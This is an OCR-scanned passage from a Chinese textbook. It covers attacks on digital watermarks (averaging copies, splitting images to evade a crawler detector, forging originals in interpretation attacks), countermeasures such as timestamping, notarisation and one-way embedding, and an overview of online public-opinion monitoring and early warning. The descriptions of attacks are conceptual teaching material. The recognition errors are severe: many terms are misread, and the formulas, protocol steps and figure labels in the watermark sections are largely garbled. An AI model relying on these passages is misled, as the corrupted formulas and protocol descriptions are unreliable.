就 在 于 找 出 现 有 系统 的 弱点 及 其 易 受 攻击 的 原因 ， 然 后 加 以 改进 。 典 型 水 印 攻击 方式 可 
以 分 为 鲁 棒 性 攻击 、 表 达 攻 击 、 解 释 攻击 和 法 律 攻击 ， 其 中 前 3 类 可 归 类 为 技术 攻击 ， 
而 法 律 攻击 则 完全 不 同 ， 它 是 在 水 印 方案 所 提供 的 技术 特点 或 科学 证 据 的 范围 之 外 进行 
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的 。 在 此 ， 仅 论述 常见 的 前 3 类 技术 攻击 方法 和 一 些 基 本 对 策 。 

a) 鲁 棒 性 攻击 

在 不 损害 图 像 使 用 价值 的 前 提 下 减弱 、 移 去 或 破坏 水 印 , 也 就 是 各 种 信号 处 理 操作 ， 
还 有 一 种 可 能 性 是 面向 算法 分 析 的 。 这 种 方法 针对 具体 的 水 印 插入 和 检测 算法 的 弱点 来 
实现 攻击 。 攻 击 者 可 以 找到 嵌入 不 同 水 印 的 统一 原始 图 像 的 多 个 版 本 ， 产 生 一 个 新 的 图 
像 。 大 部 分 情况 下 只 要 简单 的 平均 一 下 ， 就 可 以 有 效 的 逼近 原始 图 像 ， 消 除 水 印 。 这 种 
攻击 方法 的 基础 就 是 认识 到 大 部 分 现 有 算法 不 能 有 效 的 抵御 多 拷贝 联合 攻击 〈 相 当 于 上 
述 一 般 分 类 方法 中 的 统计 学 水 印 抽取 )。 

鲁 棒 性 攻击 以 减少 或 消除 数字 水 印 的 存在 为 目的 ， 包 括 像 素 值 失 真 攻击 、 敏 感性 分 
析 攻 击 和 梯度 下 降 攻 击 等 。 这 些 方法 并 不 能 将 水 印 完全 除去 , 但 可 能 充分 损坏 水 印信 息 。 
为 抵抗 这 类 攻击 ， 总 体 要 求 水 印 算法 是 公开 的 ， 算 法 的 安全 性 应 依赖 于 与 图 像 内 容 有 关 
或 无 关 的 密 钥 及 算法 本 身 的 特性 。 

(2) 表达 攻击 

这 种 攻击 并 不 一 定 要 移 去 水 印 ， 它 的 目标 是 对 数据 作 一 定 的 操作 和 处 理 ， 使 得 检测 
器 不 能 检测 到 水 印 的 存在 。 一 个 典型 的 例子 是 用 这 种 方法 愚弄 Intemet 上 的 自动 侵权 探 
测 器 Webcrawler。 这 个 探测 器 自动 在 网 上 下 载 图 片 ， 然 后 根据 水 印 检查 有 无 侵权 行为 。 
它 的 一 个 弱点 是 当 图 像 尺寸 较 小 时 ， 会 认为 图 像 太 小 ， 不 可 能 包含 水 印 。 那 么 我 们 可 以 
先 把 水 印 图 像 分 割 ， 使 每 一 小 块 图 像 的 尺寸 小 于 Webcrawler 要 求 的 尺寸 下 限 ， 再 用 合适 
的 HTML 标记 把 小 图 像 重 组 在 Web 页 中 。 这 种 攻击 方法 一 点 也 不 改变 图 像 的 质量 ， 但 
由 于 Webcrawler 看 到 的 只 是 单个 的 小 图 像 ， 所 以 它 失败 了 。 

表达 攻击 是 让 图 像 水 印 变 形 而 使 水 印 存在 性 检测 失败 , 包括 置 乱 攻击 、 同 步 攻击 等 。 
与 鲁 棒 性 攻击 相反 ， 表 达 攻 击 实际 上 并 不 除去 嵌入 的 水 印 ， 而 试图 使 水 印 检测 器 与 嵌入 
的 信息 不 同步 。 当 二 者 完全 同步 时 ， 检 测 器 能 恢复 嵌入 的 水 印信 息 ， 但 对 同步 处 理 的 复 
杂 性 要 求 太 高 而 不 便于 实用 。 为 了 战胜 表达 攻击 , 水 印 的 检测 算法 应 有 与 人 交互 的 功能 ， 
或 设计 更 复杂 更 智能 的 包含 所 有 表达 攻击 模式 的 检测 器 。 

(3) 解释 攻击 

在 一 些 水 印 方案 中 可 能 存在 对 检测 出 的 水 印 具 有 多 种 解释 。 解 释 攻击 包括 拷贝 攻 
击 、 可 逆 攻 击 等 ， 它 使 数字 水 印 的 版 权 保护 受到 了 挑战 。 这 种 攻击 在 面 对 检 测 到 的 水 印 
证 据 时 ， 试 图 捏造 出 种 种 解释 来 证 明 其 无 效 。 一 种 通用 的 方法 是 分 析 水 印 算法 并 逆 其 道 
而 行 。 攻 击 者 先 设计 出 一 个 自己 的 水 印信 号 ， 然 后 从 水 印 图 像 中 减 去 这 个 水 印 〈 不 是 指 
代数 减 ， 而 是 插入 过 程 的 逆 ), 这 样 就 制造 出 一 个 虚假 的 原始 图 像 , 然后 他 出 示 虚 假 的 原 
始 图 像 和 捏造 出 的 水 印 ， 声 称 他 是 图 像 的 拥有 者 。 实 验 表 明 ， 真 正 拥有 者 原始 图 像 中 含 
有 攻击 者 捏造 的 水 印 的 证 据 〈 即 水 印 检测 结果 ) 与 攻击 者 虚假 图 像 中 含有 真正 拥有 者 水 
印 的 证 据 旗 鼓 相当 ， 这 带 来 了 无 法 解释 的 困境 (相当 于 上 述 分 类 方法 中 的 伪造 水 印 的 抽 
取 )。 当 然 ， 攻 击 者 必须 能 够 得 到 水 印 算法 的 细节 并 捏造 出 一 个 合理 的 水 印 。 
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一 个 最 有 效 的 方法 是 设计 出 不 可 道 的 水 印 插入 算法 ， 例 如 引入 不 可 逆 的 哈 希 过 程 。 
但 现行 算法 均 不 是 完全 不 可 道 的 。 对 于 解释 攻击 还 应 该 引入 一 种 对 水 印 的 管理 机 制 ， 比 
如 建立 可 信任 的 第 三 方 作为 水 印 验证 机 构 ， 用 管理 手段 实现 对 水 印 的 仲裁 。 另 一 个 潜在 
的 解决 方法 是 构建 与 图 像 内 容 相关 的 数字 水 印 。 

(4) 法 律 攻击 

得 益 于 关于 版 权 及 数字 信息 所 有 权 的 法 律 的 漏洞 和 不 健全 ， 据 此 应 健全 相关 法 律 条 
例 和 公证 制度 ， 把 数字 水 印 作 为 电子 证 据 应 用 于 版 权 的 仲裁 ， 其 中 涉及 计算 机 取证 和 
纳 证 。 

2. 解释 攻击 及 其 解决 方案 

(1) 水 印 仲裁 

在 发 生 版 权 纠纷 时 第 三 方 对 水 印 真 伪 进 行 鉴别 的 过 程 。 该 过 程 主要 由 计算 过 程 和 比 
较 过 程 两 大 部 分 组 成 。 当 某 作品 需要 仲裁 时 ， 待 仲裁 作品 的 所 有 者 需 向 仲裁 者 提供 水 印 
(如 果 是 非 盲 提取 水 印 方案 ， 则 所 有 者 还 需 向 仲裁 者 提供 原作 品 )。 仲 裁 者 由 计算 过 程 从 
待 仲裁 作品 中 计算 出 待 仲裁 作品 的 特征 值 F ， 然 后 由 比较 过 程 将 原作 品 特征 值 W AIS 
仲裁 作品 特征 值 W 相 比较 , 根据 其 相似 情况 与 阔 值 相 比 较 得 出 仲裁 结果 。 这 里 所 指 的 特 
征 值 在 大 多 数 情况 下 是 指 水 印 本 身 ， 而 特征 值 的 比较 则 为 水 印 相 关 性 的 测量 。 某 些 水 印 
方案 的 特征 值 为 由 水 印 等 信息 计算 出 的 一 个 统计 量 ， 对 应 的 特征 值 的 比较 则 为 一 个 最 大 
似 然 检测 器 。 


原作 品 特征 值 W WA 
待 仲裁 作品 特 
tE w’ 


品 P 


待 仲裁 作品 P' 
仲裁 结果 


图 5-18 数字 水 印 的 仲裁 过 程 


(2) 解释 攻击 

属于 协议 层 的 攻击 ， 它 以 设计 出 一 种 情况 来 阻止 版 权 所 有 者 对 所 有 权 的 断言 为 攻击 
目的 。 最 初 的 解释 攻击 是 针对 不 可 见 和 非 言 〈 需 原作 品 ) 水 印 的 仲裁 阶段 进行 的 。 这 样 
的 水 印 在 仲裁 时 ， 仲 裁 者 根据 待 仲裁 作品 与 原作 品 的 差别 来 对 水 印 进行 仲裁 。 这 样 的 促 
裁 过 程 存在 着 一 种 漏洞 ， 解 释 攻击 者 正 是 利用 了 这 一 漏洞 对 数字 水 印 的 仲裁 过 程 进 行 攻 
击 ， 使 得 仲裁 者 无 法 对 作品 的 所 有 权 做 出 正确 判断 。 

最 简单 的 解释 攻击 过 程 如 下 : 

@ 作者 A 创作 出 作品 已 ， 然 后 编码 并 注册 一 个 水 印 玩 ， 得 到 嵌 有 水 印 的 作品 
P= +W 并 将 其 公开 。 
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© 当 发 生 版 权 纠纷 ,需要 对 已 进行 仲裁 时 ,A 向 仲裁 者 J 提供 已 和 更 , JARI P P, 
AW, 执行 仲裁 水 印 过 程 ， 从 而 确定 尼 中 是 否 嵌 有 A MIKE W, 。 

@ 攻击 者 B 编码 并 注册 另 一 个 水 印 砚 ,然后 声明 PT 是 他 的 作品 , 并 且 向 仲裁 者 提 
HEME th B =P — W, o 

@ 仲裁 者 J 得 出 如 下 结论 : 

HAARE, P AEE, PERAKE, R EREKE W, — W, . 

BWR, Beth, PERAKE, , P, RAKE W, — W, 。 

以 上 两 种 结果 完全 对 称 。 这 样 ， 丁 就 无 法 通过 鉴别 确定 P EIRA MKE E W, 还 
是 静 ， 所 以 也 就 无 从 区 分 版 权 所 有 者 是 A 还 是 B， 引 起 无 法 仲裁 的 版 权 纠 纷 ， 解 释 攻 
击 成 功 。 


原作 者 A 攻击 者 B 
原始 i P, 原始 水 印 W, 伪造 作品 P, EKEN W, 
水 印 作 品 P (伪造 ) 水印 作品 P? 
仲裁 者 J 仲裁 过 程 


P) 是 A 的 作品 P? 是 B 的 作品 


Rs ae 


PP 的 所 有 权 无 法 判定 


图 5-19 解释 攻击 过 程 


G) 抗 解释 攻击 解决 方案 

通过 对 解释 攻击 成 功 的 原因 进行 分 析 ， 发 现 大 多 数 不 可 见 、 需 原 图 的 数字 水 印 方案 
主要 有 以 下 三 方面 的 不 足 : 首先， 大 多 数 水 印 方案 没有 提供 本 质 的 方法 来 检测 两 个 水 印 
中 哪 一 个 是 先 加 上 去 的 ， 其 次 ， 由 于 水 印 注册 时 仅仅 对 水 印 序列 进行 了 注册 ， 而 没有 对 
原作 品 进行 注册 ， 使 得 攻击 者 可 以 伪造 原作 品 ;， 第 三 ， 由 于 水 印 嵌 入 方案 具有 可 逆 性 ， 
为 伪造 水 印 提 供 了 条 件 。 从 以 上 三 个 方面 的 不 足 出 发 ， 可 以 对 原 有 水 印 方案 进行 改进 ， 
增强 对 解释 攻击 的 稳健 性 。 

目前 ， 由 解释 攻击 所 引起 的 无 法 仲裁 的 版 权 纠纷 的 解决 方案 主要 有 三 种 : 第 一 种 方 
法 是 引入 时 戳 机 制 ， 从 而 确定 两 个 水 印 被 嵌入 的 先后 顺序 ;第 二 种 方法 作者 在 注册 水 印 
序列 的 同时 对 原始 作品 加 以 注册 ， 以 便于 增加 对 原始 图 像 的 检测 ;第 三 种 方法 是 利用 单 


Bos 项 
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向 水 印 方案 消除 水 印 嵌 入 过 程 中 的 可 逆 性 .其 中 前 两 种 都 是 对 水 印 的 使 用 环境 加 以 限制 ， 
最 后 一 种 则 是 对 解释 攻击 的 条 件 加 以 破坏 。 下 面 将 对 这 三 种 解决 方案 的 具体 实现 以 及 各 
自 的 优 劣 特性 作 具 体 的 描述 。 

© ERYL 

在 加 密 术 中 ， 时 戳 机 制 主要 用 于 数字 签名 ， 以 防止 某 些 只 能 使 用 一 次 的 签名 文件 被 
重复 使 用 或 对 签名 的 和 否认。 在 数字 水 印 典 入 过 程 中 ， 如 果 合 理 使 用 了 时 戳 机 制 ， 就 能 够 
轻易 判定 哪 一 个 水 印 是 被 先 添加 上 去 的 ， 也 就 解决 了 解释 攻击 所 引起 的 版 权 纠纷 无 法 判 
决 的 问题 。 在 这 种 情况 下 ， 时 戳 所 起 的 作用 只 是 要 证 明 作 者 在 某 个 时 间 之 前 为 作品 加 入 
了 水 印 ， 而 无 须 证 明 水 印 是 在 哪个 时 间 之 后 被 加 入 的 。 

由 于 个 人 难以 产生 可 信 的 时 戳 ， 因 此 利用 时 戳 机 制 来 解决 解释 攻击 问题 ， 首 先 必须 
存在 一 个 可 信 的 时 戳 服 务 中 心 TSS。 下 面 是 作者 A 向 作品 了 中 添加 含 时 戳 水 印 一 个 例子 
的 具体 过 程 : 

。 作者 A 创作 出 作品 已 ; 

。 A 生成 并 注册 一 个 水 印 现 ; 

o AMP, AUW, 生成 水 印 作品 已 ; 

。 和 A 计 算 Q=h(P ); 

。 A 对 QQ 等 名 Siga(Q); 

。 A 将 (QSiga(Q)) 发 送 给 TSS; 

。 TSS 对 T=(Q,Siga(Q),T) 签 名 Siga(T, ), 并 将 〈 五 ,Siga( 五 )) 发 送 给 A; 

e AH CT Siga(T,)) WA P PER RP ,并 将 Pr 作为 最 终 版 本 在 网 络 中 传播 。 

由 于 用 于 版 权 保护 的 水 印 要求 具 有 一 定 的 稳健 性 ， 因 此 向 己 LA CT, Siga(T, )) 
不 会 影响 水 印 玩 的 检测 ， 这 样 ， 当 发 生 纠纷 时 ， 提 取出 的 〈 开 ,Siga( 开 )) 能 够 证 明 A 
是 在 时 间 了 之 前 产生 水 印 作品 天 AY, BIKEN W, 是 在 时 间 工 之 前 被 嵌入 作品 忆 的 。 而 攻 
击 者 B 得 到 传播 中 的 妃 ， 并 创作 出 伪造 作品 的 时 间 必 然 滞 后 于 T,， 这 样 就 无 法 成 功 地 进 
行 解 释 攻击 。 

这 种 利用 时 戳 机 制 来 解决 解释 攻击 所 引起 的 无 法 仲裁 的 版 权 纠纷 在 理论 上 是 可 行 
的 。 但 由 于 A 要 向 P 中 添加 的 信息 除 水 印 W 外 ， 另 外 增加 了 水 印 作 品 户 的 哈 希 值 Q， 
A 对 Q 的 签名 Siga(Q)， 时 间 T， 以 及 TSS 对 (Q,Siga(Q),T) 的 签名 ， 这 样 对 于 一 些 较 
小 作品 可 能 会 引起 大 的 失真 另外, 这 些 信息 的 加 入 对 水 印 玩 的 稳健 性 也 会 有 一 定 影响 ， 
T W, 的 稳健 性 正 是 抵抗 解释 攻击 首先 要 予以 保证 的 。 因 为 ， 如 果 无 法 检测 出 于 WA 
时 戳 机 制 的 使 用 也 就 失去 了 意义 。 

@ 公证 机 制 

利用 公证 机 制 来 解决 解释 攻击 引起 的 版 权 纠纷 , 主要 是 指 作者 A 在 注册 水 印 序列 瑟 
的 同时 , 也 将 原始 作品 已 进行 注册 , 在 这 样 一 种 机 制 下 , 攻击 者 B 也 必须 对 他 的 水 印 静 
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和 伪造 原始 作品 马 进 行 注册 。 发 生 版 权 纠纷 时 ， 当 经 过 图 5-19 所 示 的 过 程 无 法 判定 作品 
P 的 所 有 权时 ,作者 A 可 以 要 求 仲裁 者 了 对 双方 的 原始 作品 进行 检测 。 如 果 在 攻击 者 B 
的 伪造 原始 作品 马 中 能 够 检测 出 攻击 者 的 水 印 更 ， 而 在 作者 A 的 原始 作品 五 中 无 法 检 


测 出 攻击 者 的 水 印 玩 如 图 5-20 所 示 )， 则 可 以 证 明 攻击 者 的 伪造 原始 作品 是 由 作者 的 
原始 作品 修改 得 出 的 。 y 

在 图 5-20 所 示 的 情况 下 ， 公 正 机 制 有 效 的 阻止 了 解 p, w 一 AN 
释 攻 击 。 但 是 ， 在 相当 多 的 情况 下 ， 攻 击 者 B 可 以 构造 DL y 
KED W, 和 原始 作品 已 ， 使 得 在 忆 中 能 够 检测 出 戊 ， 这 ™ po 


样 就 将 版 权 纠 纷 又 一 次 引入 无 法 仲裁 的 状态 之 中 ， 因 此 ， 
简单 的 采取 对 水 印 序列 和 原始 图 像 注册 公证 的 机 制 并 不 
能 彻底 解决 由 解释 攻击 引起 的 无 法 仲裁 的 版 权 纠纷 。 另 外 ， 这 种 公证 机 制 要 求 作者 对 每 
一 份 原始 作品 都 进行 注册 ， 不 仅 需 要 一 个 庞大 的 数据 库 ， 更 需要 复杂 的 协议 来 保证 公证 
机 构 的 绝对 安全 ， 其 代价 是 相当 大 的 。 

@ 单 向 水 印 机 制 

考察 解释 攻击 的 第 三 步 “ 攻 击 者 B 编码 并 注册 另 一 个 水 印 现 ， 然 后 声称 P' 是 他 的 
作品 ， 并 且 向 仲裁 者 提供 原作 品 肪 =P 一 砚 ”可 见解 释 攻 击 能 够 获得 成 功 的 一 个 关键 
因素 是 ， 攻 击 者 B 能 够 通过 从 P 中 提取 水 印 丙 来 达到 生成 伪造 的 原作 品 的 目的 。 如 果 
水 印 的 嵌入 机 制 具有 单 向 性 ， 那 么 必定 为 攻击 者 伪造 原作 品 造 成 很 大 的 困难 。 反 之 ， 如 
果 水 印 方案 是 可 道 的， 攻击 者 就 一 定 可 以 对 其 进行 攻击 。 

一 个 单 向 水 印 方案 实现 过 程 的 描述 如 下 

作者 A 创作 出 作品 马 ， 注 册 水 印 序列 印 ,={ wa ,waz ，…, Wan}: 

作者 A 使 用 某 种 方案 得 到 一 个 允许 嵌入 水 印 长 度 为 na 的 序列 S={ 5 ，s2,.…,5, }; 

作者 A 使 用 一 个 单 向 哈 希 函数 五 计算 出 作品 的 位 哈 希 值 HEL, h h} FER 
有 位 为 “1”; 

对 所 有 s; (0<i<n+1) 作 如 下 处 理 : 若 si; 为 第 OGHA h = 的 位 ， 计 算 
5, =5, +t. Wy); FF 5, A t(0<t<n—k+ 1) h, =0 的 位 ， IHRE s? = 5, HIHA Wakar): 

以 序列 S*={ s,s;,…,s; } 代 替 序 列 S， 生 成 水 印 作品 BF. 

由 于 该 水 印 方案 需要 原始 作品 忆 来 生成 序列 S 才能 完成 水 印 的 嵌入 , 即 只 有 已 知 原 
始 作 品 才能 够 嵌入 水 印 ， 同 样 ， 已 知 原始 作品 才能 够 提取 水 印 。 这 样 攻击 者 就 无 法 使 用 
同样 的 方法 直接 从 PP 中 提取 静 而 逆向 生成 伪造 的 原作 品 马 。 其 中 A 为 水 印 镶嵌 的 强度 
参数 。 

单 向 数字 水 印 具 有 以 下 一 些 优点 : 

。 可 以 对 抗 逆 镶嵌 水 印 伪 造 攻击 ， 因 此 在 密码 学 意义 上 有 较 强 的 安全 性 。 

。 用 户 的 水 印 码 字 可 以 公开 ， 这 样 就 不 需要 对 仲裁 者 严格 要 求 或 一 些 复杂 的 安全 


图 5-20 对 原始 作品 的 检测 结果 
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协议 。 
。 数字 水 印 的 镶嵌 与 鉴别 过 程 方便 ， 版 权 所 有 者 可 以 独立 的 添加 水 印 而 不 需要 履行 
登记 手续 ， 鉴 别 时 也 不 需要 在 数据 库 中 查找 原因 。 


5.4 MERIA 


5.4.1 网 络 与 情 的 定义 


与 情 是 指 公众 关于 现实 社会 以 及 社会 中 的 各 种 现象 、 问 题 所 表达 的 信念 、 态 度 、 意 
见 和 情绪 表现 的 总 和 ， 具 有 相对 的 一 致 性 、 强 烈 程 度 和 持续 性 ， 对 社会 发 展 及 有 关 事态 
的 进程 产生 影响 ， 其 中 混杂 着 理智 和 非 理 智 的 成 分 。 

网 络 与 情 是 指 在 互联 网 上 流行 的 对 社会 问题 不 同 看 法 的 网 络 与 论 ， 是 社会 与 论 的 一 
种 表现 形式 ， 是 通过 互联 网 传播 的 公众 对 现实 生活 中 某 些 热点 、 焦 点 问题 所 持 的 有 较 强 
影响 力 、 倾 向 性 的 言论 和 观点 。 网 络 与 情 定 义 : 网 络 与 情 是 以 网 络 为 载体 ， 以 事件 为 核 
心 ， 广 大 网 民情 感 、 态 度 、 意 见 、 观 点 的 表达 、 传 播 与 互动 ， 以 及 后 续 影 响 力 的 集合 。 

近年 来 ， 网 络 与 情 对 政治 生活 秩序 和 社会 稳定 的 影响 与 日 俱 增 ， 一 些 重大 的 网 络 与 
情事 件 使 人 们 开始 认识 到 网 络 对 社会 监督 起 到 的 巨大 作用 。 同 时 ， 网 络 与 情 突 发 事件 如 
果 处 理 不 当 ， 极 有 可 能 诱发 民众 的 不 良 情绪 ， 引 发 群众 的 违规 和 过 激 行为 ， 进 而 对 社会 
稳定 构成 威胁 。 互 联网 作为 一 块 正在 加 速 膨 胀 的 思想 阵地 ， 网 络 与 情 的 爆发 将 以 “内 容 
威胁 ”的 形式 对 社会 公共 安全 形成 威胁 ， 及 时 了 解 互联 网 与 情 导 向 有 利于 辅助 领导 决策 。 
同时 ， 虚 假 、 不 良 信息 通过 互联 网 传播 引发 的 网 络 与 论 ， 容 易 引 发 政治 、 经 济 危 机 和 社 
会 矛盾 。 因 此 ， 加 强 互联 网 信息 的 监管 ， 用 先进 的 技术 管理 互联 网 ， 替 代 落 后 的 人 工 济 
览 ， 对 境内 、 境 外 互联 网 信息 实时 监测 、 采 集 及 内 容 提取 ， 获 得 互联 网 信息 热点 、 焦 点 
和 趋势 分 析 ， 为 用 户 辅助 编辑 提供 信息 预警 、 网 络 信息 报告 以 及 追踪 已 发 现 的 信息 焦点 
等 ， 对 应 对 网 络 突 发 的 公共 事件 和 全 面 掌握 社会 社情 民意 具有 极其 重大 的 社会 意义 。 


5.4.2 网络 与 情 的 表现 方式 


随 着 因特网 在 全 球 范 围 内 的 飞速 发 展 ， 网 络 媒体 已 被 公认 为 是 继 报纸 、 广 播 、 电 视 
之 后 的 “第 四 媒体 ” 网 络 成 为 反映 社会 舆情 的 主要 载体 之 一 。 网 络 与 情 其 表现 方式 主要 
A: 新 闻 评 论 、BBS 论坛 、 博 客 、 播 客 、 聚 合 新 闻 (RSS)、 新 闻 跟 帖 、 转 帖 等 等 。 
5.4.3 网络 舆 情 的 特点 


网 络 与 情 表达 快捷 、 信 息 多 元 ， 方 式 互动 。 网 络 的 开放 性 和 虚拟 性 ， 决 定 了 网 络 与 
情 具 有 以 下 特点 : 
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(1) 直接 性 

通过 BBS、 新 闻 点 评 和 博客 网 站 ， 网 民 可 以 立即 发 表意 见 ， 下 情 直接 上 达 ， 民 意 表 
达 更 加 畅通 ;网络 与 情 还 具有 无 限 次 即时 快速 传播 的 可 能 性 。 在 网 络 上 ， 只 要 复制 粘贴 ， 
信息 就 得 到 重新 传播 。 相 比较 传统 媒体 的 若干 次 传播 的 有 限 性 ， 网 络 与 情 具有 无 限 次 传 
播 的 潜能 。 网 络 的 这 种 特性 使 它 可 以 轻易 穿越 封锁 ， 令 监管 部 门 束手无策 。 

(2) 随意 性 和 多 元 化 

“网 络 社会 ”所 具有 的 虚拟 性 、 匿 名 性 、 无 边界 和 即时 交互 等 特性 ， 使 网 上 与 情 在 
价值 传递 、 利 益 诉求 等 方面 呈现 多 元 化 、 非 主流 的 特点 。 加 上 传统 “把 关 人 ”作用 的 削 
弱 ， 各 种 文化 类 型 、 思 想 意 识 、 价 值 观 念 、 生 活 准 则 、 道 德 规范 都 可 以 找到 立足 之 地 ， 
有 积极 健康 的 与 论 ， 也 有 庸俗 和 灰色 的 与 论 ， 以 致 网 络 与 论 内 容 五 花 八 门 、 异 常 丰富 。 
网 民 在 网 上 或 隐匿 身份 、 或 现身说法 ， 纵 谈 国事 ， 嘻 把 笑 骂 ， 交 流 思想 ， 关 注 民 生 ， 多 
元 化 的 交流 为 民众 提供 了 宣泄 的 空间 ， 也 为 搜集 真实 与 情 提 供 了 素材 。 

(3) 突 发 性 

网 络 打破 了 时 间 和 空间 的 界限 ， 重 大 新 闻 事 件 在 网 络 上 成 为 关注 焦点 的 同时 ， 也 迅 
速成 为 与 论 热 点 。 在 当前 ,导论 炒作 方式 主要 是 先 由 传统 媒体 发 布 ， 然 后 在 网 络 上 转载 ， 
再 形成 网 络 与 论 ， 最 后 反馈 回 传统 媒体 。 网 络 可 以 实时 更 新 的 特点 ， 使 得 网 络 与 论 可 以 
最 快 的 速度 传播 。 

(4) 隐蔽 性 

互联 网 是 一 个 虚拟 的 世界 ， 由 于 发 言 者 身份 隐蔽 ， 并 且 缺 少 规则 限制 和 有 效 监 督 ， 
网 络 自然 成 为 一 些 网 民 发 泄 情绪 的 空间 。 

(5) 偏差 性 

互联 网 与 情 是 社情 民意 中 最 活跃 、 最 尖锐 的 一 部 分 ， 但 网 络 与 情 还 不 能 等 同 于 全 民 
立场 。 随 着 互联 网 的 普及 ， 新 闻 跟 帖 、 论 坛 、 博 客 的 出 现 ， 中 国 网 民 们 有 了 空前 的 话语 
权 ， 可 以 较为 自由 地 表达 自己 的 观点 与 感受 。 但 由 于 网 络 空间 中 法 律 道德 的 约束 较 弱 ， 
如 果 网 民 缺 乏 自律 ， 就 会 导致 某 些 不 负责 任 的 言论 ， 比 如 热衷 于 揭 人 隐私 、 谣 言 惑 众 ， 
反 社会 倾向 ， 偏 激 和 非 理性 ， 群 体 盲 从 与 冲动 等 等 。 


5.4.4 网 络 恤 情 的 诱发 因素 


伍 情 是 较 多 群众 关于 现实 社会 及 社会 中 各 种 现象 、 问 题 所 表达 的 信念 、 态 度 、 意 见 
和 情绪 表现 的 总 和 。 网 络 与 情 与 社会 与 情 在 内 容 表现 形态 方面 具有 一 致 性 ， 网 络 与 情 在 
一 定 程 度 上 会 影响 社会 与 情 的 发 展 趋势 。 

(1) 社会 突 发 公共 事件 

社会 突 发 事件 很 容易 形成 社会 与 论 焦点 和 热点 。 网 民 根据 自己 对 突 发 公共 事件 的 理 
解 ， 发 表 自己 的 见解 ， 通 过 网 络 论坛 等 渠道 交流 自己 的 看 法 。 

社会 突 发 事件 根据 其 性 质 、 社 会 危害 程度 、 影 响 范围 等 因素 ， 可 分 为 一 般 严 重 〈IV 
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级 )、 比 较 严重 CBO. WAE CIA) 和 特别 严重 〈 工 级 ) 等 四 级 。 突 发 公共 事件 
的 等 级 划分 可 以 作为 网 络 与 情 的 级 别 划分 的 参考 。 

(2) 虚假 信息 和 不 良 信息 

在 BBS 论坛 等 交互 性 较 强 的 网 站 ， 网 络 信息 可 能 由 人 为 操控 ， 使 信息 向 不 良 趋势 发 
展 。 在 互联 网 上 ， 由 于 网 民 可 以 匿名 对 自己 感 兴趣 的 话题 发 表 看 法 ， 当 出 现 多 个 网 民 对 
同一 条 信息 发 表 的 不 同 评论 不 仅 思 路 一 致 、 语 气相 似 , 而 且 他 地 址 也 大 致 相同 ， 那 就 有 
可 能 存在 人 为 操纵 。 

除了 倾向 性 被 操纵 的 问题 外 ， 互 联网 上 还 存在 一 些 虚 假 信息 。 这 些 虚 假 信息 损害 了 
网 络 媒 体 的 公信 和 度 ， 一 旦 被 网 民 采 信 ， 就 会 给 社会 造成 极 大 危害 。 目 前 ， 网 络 不 良 信息 
传播 的 认定 、 取 证 等 没有 明确 规定 。 由 于 网 络 产品 的 特殊 性 ， 如 何 判断 网 络 谣言 、 暴 力 、 
人 身 污 茂 、 网 络 色情 等 不 良 信息 ， 如 何 确定 所 造成 的 后 果 都 没有 明确 的 指向 ， 也 没有 相 
对 明确 的 取证 规定 ， 为 公平 透明 执法 带 来 一 定 难度 ， 模 糊 性 太 强 。 


5.4.5 网络 舆情 的 监测 技术 


近 几 年 ， 已 经 有 各 项 舆情 分 析 手 段 ， 利 用 技术 手段 实现 对 海量 的 网 络 舆 情 信 息 进行 
深度 挖掘 与 分 析 ， 以 快速 汇总 成 舆情 信息 ， 从 而 代替 人 工 阅 读 和 分 析 网 络 与 情 信息 的 繁 
复工 作 。 网 络 与 情 的 关键 性 技术 主要 包含 以 下 四 个 方面 

(1) 网 络 与 情 采 集 与 提取 技术 

网 络 与 情 主 要 通过 新 闻 、 论 坛 /BBS、 博 客 、 即 时 通信 软件 等 渠道 形成 和 传播 ， 这 些 
通道 的 承载 体 主要 为 动态 网 页 ， 它 们 承载 着 松散 的 结构 化 信息 ， 使 得 舆情 信息 的 有 效 抽 
取 很 有 难度 。 

(2) 网 络 导 情话 题 发 现 与 追踪 技术 

网 民 讨 论 的 话题 繁多 , 涵盖 社会 方方面面 ,如何 从 海量 信息 中 找到 热点 、 敏感 话 题 ， 
并 对 其 趋势 变化 进行 追踪 成 为 研究 热点 。 

(3) 网 络 熏 情 倾向 性 分 析 技 术 

通过 倾向 性 分 析 可 以 明确 网 络 传播 者 所 列 含 的 感情 、 态 度 、 观 点 、 立 场 、 意 图 等 主 
观 反映 。 对 与 情 文本 进行 倾向 性 分 析 ， 实 际 上 就 是 试图 用 计算 机 实现 根据 文本 的 内 容 提 
炼 出 文本 作者 的 情感 方向 的 目标 。 

(4) 多 文档 自动 文摘 技术 

新 闻 、 帖 子 、 博 文 等 页 面 都 包含 着 垃圾 信息 ， 多 文档 自动 摘要 技术 能 对 页 面 内 容 进 
行 过 滤 ， 并 提炼 成 概要 信息 ， 便 于 查询 和 检索 。 


5.4.6 “网络 与 情 的 预警 措施 


网 络 与 情 预 警 和 应 对 是 指 从 危机 事件 的 征兆 出 现 到 危机 造成 可 感知 的 损失 这 段 时 
间 内 ， 对 网 络 与 情 尤其 是 负面 与 情 的 及 时 妥善 控制 ， 从 而 达到 有 效 化 解 网 络 与 论 危 机 的 
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目的 。 网 络 与 情 预警 的 意义 在 于 及 早 发 现 危 机 的 苗头 ， 及 早 对 可 能 产生 的 现实 危机 的 走 
向 、 规 模 进行 判断 ， 及 早 通知 各 有 关 职 能 部 门 共同 做 好 应 对 危机 的 准备 。 

(1) 制定 应 急 预 案 

针对 各 种 类 型 的 危机 事件 ， 制 定 比较 详尽 的 判断 标准 和 预警 方案 ， 制 定 处 置 网 络 与 
情 突 发 事件 的 应 急 预案 ， 一 旦 危机 出 现 便 有 章 可 循 、 对 症 下 药 。 

(2) 加 强 监测 力度 ， 密 切 关注 事态 发 展 

加 强 监测 力度 ， 密 切 关 注 事态 发 展 ， 保 持 对 事态 第 一 时 间 的 知情 权 监测 预警 能 力 的 
高 低 ， 主 要 体现 在 能 否 从 每 天 海量 的 网 络 言论 中 敏锐 地 发 现 潜在 的 危机 苗头 ， 以 及 准确 
判断 这 种 发 现 与 危机 可 能 爆发 之 间 的 时 间 差 。 这 个 时 间 差 越 大 ， 相 关 职 能 部 门 越 有 充裕 
的 时 间 准 备 ， 为 下 一 阶段 危机 的 有 效应 对 赢得 宝贵 的 时 间 。 

(3) 建立 并 完善 公共 危机 的 信息 通报 机 制 

建立 和 完善 新 闻 发 言 人 制度 ， 规 范 、 及 时 地 进行 信息 披露 ， 最 大 限度 地 满足 民众 的 
知情 权 。 坚 决 制止 在 信息 传递 方面 的 欺 上 瞒 下 和 报喜 不 报 忧 ， 提 高 政府 在 危机 处 理 中 信 
